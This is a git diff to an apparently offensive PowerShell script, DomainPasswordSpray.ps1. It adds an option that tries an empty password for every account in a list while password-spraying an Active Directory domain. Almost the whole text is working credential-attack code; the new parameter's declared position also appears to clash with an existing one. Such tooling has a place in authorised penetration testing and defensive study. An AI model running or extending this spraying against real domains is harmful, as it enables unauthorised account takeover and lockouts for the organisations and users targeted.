diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index 3395c47..a8cac3a 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -45,6 +45,10 @@ function Invoke-DomainPasswordSpray{ .PARAMETER UsernameAsPassword For each user, will try that user's name as their password + + .PARAMETER EmptyPassword + + For each user, will try an empty password .EXAMPLE @@ -109,7 +113,11 @@ function Invoke-DomainPasswordSpray{ $Delay=0, [Parameter(Position = 9, Mandatory = $false)] - $Jitter=0 + $Jitter=0, + + [Parameter(Position = 7, Mandatory = $false)] + [switch] + $EmptyPassword ) @@ -121,6 +129,10 @@ function Invoke-DomainPasswordSpray{ { $Passwords = "" } + elseif($EmptyPassword) + { + $Passwords = "" + } elseif($PasswordList) { $Passwords = Get-Content $PasswordList @@ -215,6 +227,10 @@ function Invoke-DomainPasswordSpray{ { Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -UsernameAsPassword } + elseif($EmptyPassword) + { + Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -EmptyPassword + } else { for($i = 0; $i -lt $Passwords.count; $i++) @@ -497,7 +513,10 @@ function Invoke-SpraySinglePassword $Jitter=0, [Parameter(Position=7)] [switch] - $UsernameAsPassword + $UsernameAsPassword, + [Parameter(Position=8)] + [switch] + $EmptyPassword ) $time = Get-Date $count = $UserListArray.count @@ -512,6 +531,10 @@ function Invoke-SpraySinglePassword { $Password = $User } + elseif($EmptyPassword) + { + $Password = "" + } $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain,$User,$Password) if ($Domain_check.name -ne $null) {